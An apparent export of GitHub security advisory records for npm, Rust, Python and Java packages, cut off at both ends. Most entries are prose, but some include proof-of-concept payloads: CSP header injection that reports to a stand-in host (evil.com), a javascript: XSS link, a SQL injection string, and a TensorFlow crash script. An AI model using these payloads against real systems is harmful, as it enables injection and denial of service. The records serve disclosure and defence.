v0.26.0以前のfrourioを使用している、かつvalidators/を利用している場合、ネストされたバリデータがリクエストのボディーとクエリに対して正しく働かないケースがあります。また、リクエストに対してバリデーションが効かなくなる入力があります。
### パッチ
frourioをv0.26.0かそれ以降のバージョンにアップデートをお願いします。frourio を使用したプロジェクトには `class-transformer` と `reflect-metadata` の依存への追加も必要となります。
### ワークアラウンド
controller側で自分でclass-transformerを使用してチェックする、vaildatorを使わない、など。
### さらなる情報
このセキュリティ勧告に関する質問やコメントについては、以下の方法でお問い合わせいただけます。
* [frourio](https://github.com/frouriojs/frourio)にIssueを開く。
## English
### Impact
Frourio users who uses frourio version prior to v0.26.0 and integration with class-validator through `validators/` folder. Validators does not work properly for request bodies and queries in specific situations. Addtionally, some kind of input is not validated. (false positives)
### Patches
Please update your frourio to v0.26.0 or later. You also need to install `class-transformer` and `reflect-metadata` to your project.
### Workarounds
Validate objects from request with class-transformer in controllers by yourself, or prevent using validators.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [frourio](https://github.com/frouriojs/frourio)
|
{'CVE-2022-23623'}
|
2022-04-19T19:03:22Z
|
2022-02-07T22:37:45Z
|
HIGH
| 8.1
|
{'CWE-20'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23623', 'https://github.com/frouriojs/frourio/security/advisories/GHSA-8xxm-h73r-ghfj', 'https://github.com/advisories/GHSA-8xxm-h73r-ghfj', 'https://github.com/frouriojs/frourio/commit/7c19ac5363305b81b1c6b5232620228763d427af'}
| null |
GHSA
|
GHSA-5993-wwpg-m92c
|
Improper Authentication in Apache Ozone
|
In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.
|
{'CVE-2021-39236'}
|
2021-11-23T17:56:45Z
|
2021-11-23T17:56:45Z
|
HIGH
| 8.8
|
{'CWE-287'}
|
{'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C0fd74baa-88a0-39a2-8f3a-b982acb25d5a%40apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/11/19/7', 'https://github.com/advisories/GHSA-5993-wwpg-m92c', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39236'}
| null |
GHSA
|
GHSA-7xvg-m3vx-2hhv
|
Downloads Resources over HTTP in webrtc-native
|
Affected versions of `webrtc-native` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `webrtc-native`.
## Recommendation
No direct patch is currently available for this vulnerability.
However, if the native components of `webrtc-native` are built from source, this avoids download the precompiled binary, therefore mitigating the insecure download.
The package author has provided instructions for building from source [here](https://github.com/vmolsa/webrtc-native/wiki/Getting-started#building-from-source).
|
{'CVE-2016-10600'}
|
2021-01-08T19:13:16Z
|
2019-02-18T23:50:26Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://www.npmjs.com/advisories/176', 'https://github.com/advisories/GHSA-7xvg-m3vx-2hhv', 'https://nodesecurity.io/advisories/176', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10600'}
| null |
GHSA
|
GHSA-f2jw-pr2c-9x96
|
Code injection in @rkesters/gnuplot
|
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The gnuplot package prior to version 0.1.0 for Node.js allows code execution via shell metacharacters in Gnuplot commands.
|
{'CVE-2021-29369'}
|
2022-05-05T00:45:10Z
|
2022-02-10T23:41:49Z
|
CRITICAL
| 9.8
|
{'CWE-77', 'CWE-78'}
|
{'https://github.com/rkesters/gnuplot/commit/23671d4d3d28570fb19a936a6328bfac742410de', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29369', 'https://github.com/advisories/GHSA-f2jw-pr2c-9x96', 'https://www.npmjs.com/package/@rkesters/gnuplot'}
| null |
GHSA
|
GHSA-w978-rmpf-qmwg
|
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
|
### Impact
If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.
e.g.
```ruby
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`
```
would result in
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
```ruby
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
```
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```
### Patches
This has been fixed in 6.3.0, 5.2.0, and 3.9.0
### Workarounds
```ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
```
### References
https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
[The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)
* DM us at @ndm on twitter
|
{'CVE-2020-5216'}
|
2021-01-08T20:33:22Z
|
2020-01-23T02:27:53Z
|
MODERATE
| 4.4
|
{'CWE-113'}
|
{'https://github.com/advisories/GHSA-w978-rmpf-qmwg', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5216', 'https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg', 'https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0'}
| null |
GHSA
|
GHSA-m7qm-r2r5-f77q
|
Cross-Site Scripting in react-marked-markdown
|
All versions of `react-marked-markdown` are vulnerable to cross-site scripting (XSS) via `href` attributes. This is exploitable if user is provided to `react-marked-markdown`
Proof of concept:
```
import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'
ReactDOM.render(
<MarkdownPreview
markedOptions={{ sanitize: true }}
value={'[XSS](javascript: alert`1`)'}
/>,
document.getElementById('root')
)
```
## Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
| null |
2021-09-24T20:35:30Z
|
2020-09-01T20:43:48Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-m7qm-r2r5-f77q', 'https://github.com/Vincent-P/react-marked-markdown/issues/61', 'https://www.npmjs.com/advisories/668', 'https://hackerone.com/reports/344069'}
| null |
GHSA
|
GHSA-7xf9-74cp-8hx3
|
Malicious Package in js-cha3
|
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-30T17:00:59Z
|
2020-09-03T22:59:21Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1281', 'https://github.com/advisories/GHSA-7xf9-74cp-8hx3'}
| null |
GHSA
|
GHSA-hpmr-g4pq-jhgp
|
Denial of service in chrono-node
|
This affects the package chrono-node before 2.2.4. It hangs on a date-like string with lots of embedded spaces.
|
{'CVE-2021-23371'}
|
2021-05-06T15:58:05Z
|
2021-05-06T15:58:05Z
|
HIGH
| 7.5
|
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23371', 'https://github.com/advisories/GHSA-hpmr-g4pq-jhgp', 'https://github.com/wanasit/chrono/commit/98815b57622443b5c498a427210ebd603d705f4c', 'https://github.com/wanasit/chrono/issues/382', 'https://snyk.io/vuln/SNYK-JS-CHRONONODE-1083228'}
| null |
GHSA
|
GHSA-h3qr-rq2j-74w4
|
HTTP Request Smuggling in hyper
|
An issue was discovered in the hyper crate before 0.12.34 for Rust. HTTP request smuggling can occur. Remote code execution can occur in certain situations with an HTTP server on the loopback interface.
|
{'CVE-2020-35863'}
|
2021-08-25T20:46:08Z
|
2021-08-25T20:46:08Z
|
CRITICAL
| 9.8
|
{'CWE-444'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35863', 'https://rustsec.org/advisories/RUSTSEC-2020-0008.html', 'https://github.com/hyperium/hyper/issues/1925', 'https://github.com/advisories/GHSA-h3qr-rq2j-74w4'}
| null |
GHSA
|
GHSA-393f-2jr3-cp69
|
CHECK-fail in DrawBoundingBoxes
|
### Impact
An attacker can trigger a denial of service via a `CHECK` failure by passing an empty image to `tf.raw_ops.DrawBoundingBoxes`:
```python
import tensorflow as tf
images = tf.fill([53, 0, 48, 1], 0.)
boxes = tf.fill([53, 31, 4], 0.)
boxes = tf.Variable(boxes)
boxes[0, 0, 0].assign(3.90621)
tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/ea34a18dc3f5c8d80a40ccca1404f343b5d55f91/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L148-L165) uses `CHECK_*` assertions instead of `OP_REQUIRES` to validate user controlled inputs. Whereas `OP_REQUIRES` allows returning an error condition back to the user, the `CHECK_*` macros result in a crash if the condition is false, similar to `assert`.
```cc
const int64 max_box_row_clamp = std::min<int64>(max_box_row, height - 1);
...
CHECK_GE(max_box_row_clamp, 0);
```
In this case, `height` is 0 from the `images` input. This results in `max_box_row_clamp` being negative and the assertion being falsified, followed by aborting program execution.
### Patches
We have patched the issue in GitHub commit [b432a38fe0e1b4b904a6c222cbce794c39703e87](https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
|
{'CVE-2021-29533'}
|
2021-05-21T14:22:21Z
|
2021-05-21T14:22:21Z
|
LOW
| 2.5
|
{'CWE-754'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29533', 'https://github.com/advisories/GHSA-393f-2jr3-cp69', 'https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-393f-2jr3-cp69'}
| null |
GHSA
|
GHSA-q656-g2x3-8cgh
|
Kylin can receive user input and load any class through Class.forName(...).
|
Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.
|
{'CVE-2021-31522'}
|
2022-01-13T18:41:26Z
|
2022-01-08T00:43:01Z
|
MODERATE
| 0
|
{'CWE-470'}
|
{'https://github.com/apache/kylin/pull/1763', 'https://lists.apache.org/thread/hh5crx3yr701zd8wtpqo1mww2rlkvznw', 'http://www.openwall.com/lists/oss-security/2022/01/06/4', 'https://github.com/advisories/GHSA-q656-g2x3-8cgh', 'https://github.com/apache/kylin/pull/1695', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31522'}
| null |
GHSA
|
GHSA-m9jw-237r-gvfv
|
SQL Injection in sequelize
|
Affected versions of `sequelize` are vulnerable to SQL Injection. The function `sequelize.json()` incorrectly formatted sub paths for JSON queries, which allows attackers to inject SQL statements and execute arbitrary SQL queries if user input is passed to the query. Exploitation example:
```return User.findAll({
where: this.sequelize.json("data.id')) AS DECIMAL) = 1 DELETE YOLO INJECTIONS; -- ", 1)
});```
## Recommendation
If you are using `sequelize` 5.x, upgrade to version 5.15.1 or later.
If you are using `sequelize` 4.x, upgrade to version 4.44.3 or later.
|
{'CVE-2019-10752'}
|
2021-08-18T21:54:56Z
|
2019-10-25T19:43:16Z
|
CRITICAL
| 9.8
|
{'CWE-89'}
|
{'https://github.com/advisories/GHSA-m9jw-237r-gvfv', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-459751,', 'https://github.com/sequelize/sequelize/commit/9bd0bc111b6f502223edf7e902680f7cc2ed541e', 'https://www.npmjs.com/advisories/1146', 'https://github.com/sequelize/sequelize/pull/11329', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10752', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-459751', 'https://github.com/sequelize/sequelize/commit/9bd0bc1,'}
| null |
GHSA
|
GHSA-v362-2895-h9r2
|
Use After Free in lru
|
An issue was discovered in the lru crate before 0.7.1 for Rust. The iterators have a use-after-free, as demonstrated by an access after a pop operation.
|
{'CVE-2021-45720'}
|
2022-01-07T22:37:01Z
|
2022-01-07T22:37:01Z
|
HIGH
| 7.5
|
{'CWE-416'}
|
{'https://rustsec.org/advisories/RUSTSEC-2021-0130.html', 'https://github.com/advisories/GHSA-v362-2895-h9r2', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/lru/RUSTSEC-2021-0130.md', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45720'}
| null |
GHSA
|
GHSA-4xgp-xrg3-c73w
|
Malicious Package in commqnder
|
All versions of `commqnder` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
## Recommendation
Remove the package from your environment and verify whether your system is running the cryptocurrency miner.
| null |
2021-09-30T22:02:57Z
|
2020-09-11T21:10:29Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-4xgp-xrg3-c73w', 'https://www.npmjs.com/advisories/924'}
| null |
GHSA
|
GHSA-744r-vv2g-2x6g
|
Apache NiFi information disclosure by XXE
|
The XMLFileLookupService in NiFi versions 1.3.0 to 1.9.2 allowed trusted users to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE) and reveal information such as the versions of Java, Jersey, and Apache that the NiFI instance uses.
|
{'CVE-2019-10080'}
|
2021-09-24T17:55:44Z
|
2019-12-02T18:17:36Z
|
MODERATE
| 6.5
|
{'CWE-611'}
|
{'https://nifi.apache.org/security.html#CVE-2019-10080', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10080', 'https://github.com/apache/nifi/pull/3507', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'https://github.com/advisories/GHSA-744r-vv2g-2x6g', 'https://www.oracle.com/security-alerts/cpuApr2021.html'}
| null |
GHSA
|
GHSA-hj3m-v758-jwx5
|
Path Traversal in http-server-node
|
All versions of package http-server-node are vulnerable to Directory Traversal via use of --path-as-is.
|
{'CVE-2021-23797'}
|
2022-01-05T15:02:43Z
|
2022-01-05T15:02:43Z
|
HIGH
| 7.5
|
{'CWE-22'}
|
{'https://github.com/advisories/GHSA-hj3m-v758-jwx5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23797', 'https://snyk.io/vuln/SNYK-JS-HTTPSERVERNODE-1727656'}
| null |
GHSA
|
GHSA-m5h6-hr3q-22h5
|
npm Token Leak in npm
|
Affected versions of the `npm` package include the bearer token of the logged in user in every request made by the CLI, even if the request is not directed towards the user's active registry.
An attacker could create an HTTP server to collect tokens, and by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would compromise the user's token.
This compromised token could be used to do anything that the user could do, including publishing new packages.
## Recommendation
1. Update npm with `npm install npm@latest -g`
2. [Revoke your Tokens](https://www.npmjs.com/settings/tokens)
3. Enable [Two-Factor Authentication](https://docs.npmjs.com/getting-started/using-two-factor-authentication)
|
{'CVE-2016-3956'}
|
2021-06-16T19:54:44Z
|
2018-07-31T22:58:35Z
|
HIGH
| 0
|
{'CWE-200'}
|
{'https://nodejs.org/en/blog/vulnerability/npm-tokens-leak-march-2016/', 'https://github.com/npm/npm/commit/fea8cc92cee02c720b58f95f14d315507ccad401', 'https://www.npmjs.com/advisories/98', 'https://github.com/advisories/GHSA-m5h6-hr3q-22h5', 'http://www-01.ibm.com/support/docview.wss?uid=swg21980827', 'http://blog.npmjs.org/post/142036323955/fixing-a-bearer-token-vulnerability', 'https://github.com/npm/npm/commit/f67ecad59e99a03e5aad8e93cd1a086ae087cb29', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3956', 'https://github.com/npm/npm/issues/8380'}
| null |
GHSA
|
GHSA-r9vm-rhmf-7hxx
|
OS Command Injection in im-resize
|
im-resize through 2.3.2 allows remote attackers to execute arbitrary commands via the "exec" argument. The cmd argument used within index.js, can be controlled by user without any sanitization.
|
{'CVE-2019-10787'}
|
2021-04-13T15:17:06Z
|
2021-04-13T15:17:06Z
|
HIGH
| 9.8
|
{'CWE-78'}
|
{'https://github.com/advisories/GHSA-r9vm-rhmf-7hxx', 'https://snyk.io/vuln/SNYK-JS-IMRESIZE-544183', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10787', 'https://github.com/Turistforeningen/node-im-resize/commit/de624dacf6a50e39fe3472af1414d44937ce1f03'}
| null |
GHSA
|
GHSA-5g6j-8hv4-vfgj
|
Cross-Site Scripting in node-red
|
Versions of `node-red` prior to 0.18.6 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new items, allowing attackers to execute arbitrary JavaScript in the victim's browser.
## Recommendation
Upgrade to version 0.18.6 or later.
| null |
2021-09-28T17:03:46Z
|
2020-09-11T21:21:19Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-5g6j-8hv4-vfgj', 'https://hackerone.com/reports/349146', 'https://www.npmjs.com/advisories/993'}
| null |
GHSA
|
GHSA-4c4g-crqm-xrxw
|
Use of unitialized value in TFLite
|
### Impact
All TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200):
```cc
const auto* affine_quantization =
reinterpret_cast<TfLiteAffineQuantization*>(
filter->quantization.params);
```
The issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code.
### Patches
We have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887),
[4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538).
The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-37682'}
|
2021-08-25T14:40:32Z
|
2021-08-25T14:40:32Z
|
MODERATE
| 4.4
|
{'CWE-908'}
|
{'https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538', 'https://github.com/advisories/GHSA-4c4g-crqm-xrxw', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4c4g-crqm-xrxw', 'https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37682', 'https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5'}
| null |
GHSA
|
GHSA-mrwr-2945-fr22
|
Cross-site scripting in PageKit
|
In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/exp.svg" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack.
|
{'CVE-2021-32245'}
|
2021-06-23T18:44:30Z
|
2021-06-22T15:17:28Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-mrwr-2945-fr22', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32245', 'https://github.com/pagekit/pagekit/issues/963'}
| null |
GHSA
|
GHSA-mjcr-rqjg-rhg3
|
Implementation trusts the "me" field returned by the authorization server without verifying it
|
### Impact
A malicious user can sign in as a user with any IndieAuth identifier. This is because the implementation does not verify that the final `"me"` URL value returned by the authorization server belongs to the same domain as the initial value entered by the user.
### Patches
Version 1.1 fixes this issue.
### Workarounds
There is no workaround. Upgrade to 1.1 immediately.
### References
- [Security Considerations: Differing User Profile URLs](https://indieauth.spec.indieweb.org/#differing-user-profile-urls-li-1) in the IndieAuth specification.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [simonw/datasette-indieauth](https://github.com/simonw/datasette-indieauth/issues)
| null |
2022-03-21T20:04:50Z
|
2020-11-24T21:21:04Z
|
CRITICAL
| 0
|
{'CWE-290'}
|
{'https://pypi.org/project/datasette-indieauth/', 'https://github.com/advisories/GHSA-mjcr-rqjg-rhg3', 'https://github.com/simonw/datasette-indieauth/security/advisories/GHSA-mjcr-rqjg-rhg3', 'https://github.com/simonw/datasette-indieauth/commit/376c8804c6b0811852049229a24336fe5eb6a439'}
| null |
GHSA
|
GHSA-g795-4hxx-qqwm
|
Cross-site Scripting in Pimcore
|
Pimcore prior to 10.4.0 is vulnerable to stored cross-site scripting.
|
{'CVE-2022-0893'}
|
2022-03-29T21:30:16Z
|
2022-03-16T00:00:47Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/pimcore/pimcore/commit/6e0922c5b2959ac1b48500ac508d8fc5a97286f9', 'https://github.com/advisories/GHSA-g795-4hxx-qqwm', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0893', 'https://huntr.dev/bounties/2859a1c1-941c-4efc-a3ad-a0657c7a77e9', 'https://github.com/pimcore/pimcore/pull/11447'}
| null |
GHSA
|
GHSA-28ph-f7gx-fqj8
|
Data races in rusqlite
|
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via create_module.
|
{'CVE-2020-35867'}
|
2021-08-25T20:47:57Z
|
2021-08-25T20:47:57Z
|
CRITICAL
| 9.8
|
{'CWE-362'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35867', 'https://github.com/advisories/GHSA-28ph-f7gx-fqj8', 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}
| null |
GHSA
|
GHSA-c9jj-3wvg-q65h
|
Vulnerability that affects org.apache.pdfbox:pdfbox
|
Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.
|
{'CVE-2019-0228'}
|
2022-05-04T20:30:02Z
|
2019-07-05T21:12:54Z
|
CRITICAL
| 9.8
|
{'CWE-611'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-0228', 'https://lists.apache.org/thread.html/r32b8102392a174b17fd19509a9e76047f74852b77b7bf46af95e45a2@%3Cserver-dev.james.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ/', 'https://lists.apache.org/thread.html/be86fcd7cd423a3fe6b73a3cb9d7cac0b619d0deb99e6b5d172c98f4@%3Ccommits.tika.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/bc8db1bf459f1ad909da47350ed554ee745abe9f25f2b50cad4e06dd@%3Cserver-dev.james.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX/', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r0a2141abeddae66dd57025f1681c8425834062b7c0c7e0b1d830a95d@%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/8a19bd6d43e359913341043c2a114f91f9e4ae170059539ad1f5673c@%3Ccommits.tika.apache.org%3E', 'https://lists.apache.org/thread.html/1a3756557f8cb02790b7183ccf7665ae23f608a421c4f723113bca79@%3Cusers.pdfbox.apache.org%3E', 'https://github.com/advisories/GHSA-c9jj-3wvg-q65h'}
| null |
GHSA
|
GHSA-7gfg-6934-mqq2
|
Improper Authenication in Pion DTLS
|
handleIncomingPacket in conn.go in Pion DTLS before 1.5.2 lacks a check for application data with epoch 0, which allows remote attackers to inject arbitrary unencrypted data after handshake completion.
|
{'CVE-2019-20786'}
|
2021-06-29T21:34:57Z
|
2021-06-29T21:34:57Z
|
CRITICAL
| 5.6
|
{'CWE-287'}
|
{'https://www.usenix.org/conference/usenixsecurity20/presentation/fiterau-brostean', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20786', 'https://github.com/pion/dtls/compare/v1.5.1...v1.5.2', 'https://github.com/pion/dtls/commit/fd73a5df2ff0e1fb6ae6a51e2777d7a16cc4f4e0', 'https://github.com/advisories/GHSA-7gfg-6934-mqq2', 'https://www.usenix.org/system/files/sec20fall_fiterau-brostean_prepub.pdf'}
| null |
GHSA
|
GHSA-wjpj-gmc3-5w56
|
Malicious Package in buvfer-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-30T15:46:02Z
|
2020-09-03T22:30:31Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1268', 'https://github.com/advisories/GHSA-wjpj-gmc3-5w56'}
| null |
GHSA
|
GHSA-4jwx-78vx-gm6g
|
Cross-Site Request Forgery in kimai2
|
CSRF in saving invoices / modifying status of invoices (pending and cancel only)
|
{'CVE-2021-4033'}
|
2021-12-14T15:29:59Z
|
2021-12-10T20:34:01Z
|
MODERATE
| 6.5
|
{'CWE-352'}
|
{'https://huntr.dev/bounties/e05be1f7-d00c-4cfd-9390-ccd9d1c737b7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4033', 'https://github.com/advisories/GHSA-4jwx-78vx-gm6g', 'https://github.com/kevinpapst/kimai2/commit/1da26e041df62c10bd8075d78f2db7854d3eee07'}
| null |
GHSA
|
GHSA-w65v-hx54-xrqx
|
Malicious Package in midway-xtpl
|
All versions of `midway-xtpl` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T19:50:36Z
|
2020-09-03T17:41:23Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1057', 'https://github.com/advisories/GHSA-w65v-hx54-xrqx'}
| null |
GHSA
|
GHSA-cr5w-6rv4-r2qg
|
Malicious Package in maleficent
|
All versions of `maleficent` contain malicious code. The package is a demonstration of possible risks when installing npm packages. It gathers system information such as: environment variables, OS information, network interface, AWS credentials, npm credentials and ssh keys. The package prints the information to a local file but does not upload it to a remote server.
## Recommendation
Remove the package from your environment. There is no further compromise.
| null |
2021-09-30T21:58:49Z
|
2020-09-03T02:37:45Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-cr5w-6rv4-r2qg', 'https://www.npmjs.com/advisories/951'}
| null |
GHSA
|
GHSA-3x94-fv5h-5q2c
|
Exposure of Sensitive Information to an Unauthorized Actor in TYPO3 CMS
|
> ### Meta
> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (7.5)
> * CWE-20, CWE-200
### Problem
In case an attacker manages to generate a valid cryptographic message authentication code (HMAC-SHA1) - either by using a different existing vulnerability or in case the internal _encryptionKey_ was exposed - it is possible to retrieve arbitrary files of a TYPO3 installation. This includes the possibility to fetch _typo3conf/LocalConfiguration.php_ which again contains the _encryptionKey_ as well as credentials of the database management system being used.
In case a database server is directly accessible either via internet or in a shared hosting network, this allows to completely retrieve, manipulate or delete database contents. This includes creating an administration user account - which can be used to trigger remote code execution by injecting custom extensions.
### Solution
Update to TYPO3 versions 9.5.20 or 10.4.6 that fix the problem described.
### Credits
Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.
### References
* [TYPO3-CORE-SA-2020-007](https://typo3.org/security/advisory/typo3-core-sa-2020-007)
|
{'CVE-2020-15099'}
|
2022-04-19T19:02:36Z
|
2020-07-29T16:15:32Z
|
HIGH
| 8.1
|
{'CWE-200', 'CWE-20'}
|
{'https://github.com/advisories/GHSA-3x94-fv5h-5q2c', 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-3x94-fv5h-5q2c', 'https://typo3.org/security/advisory/typo3-core-sa-2020-007', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15099'}
| null |
GHSA
|
GHSA-34jq-548x-m2x9
|
Improper Resource Shutdown or Release in TYPO3 extension
|
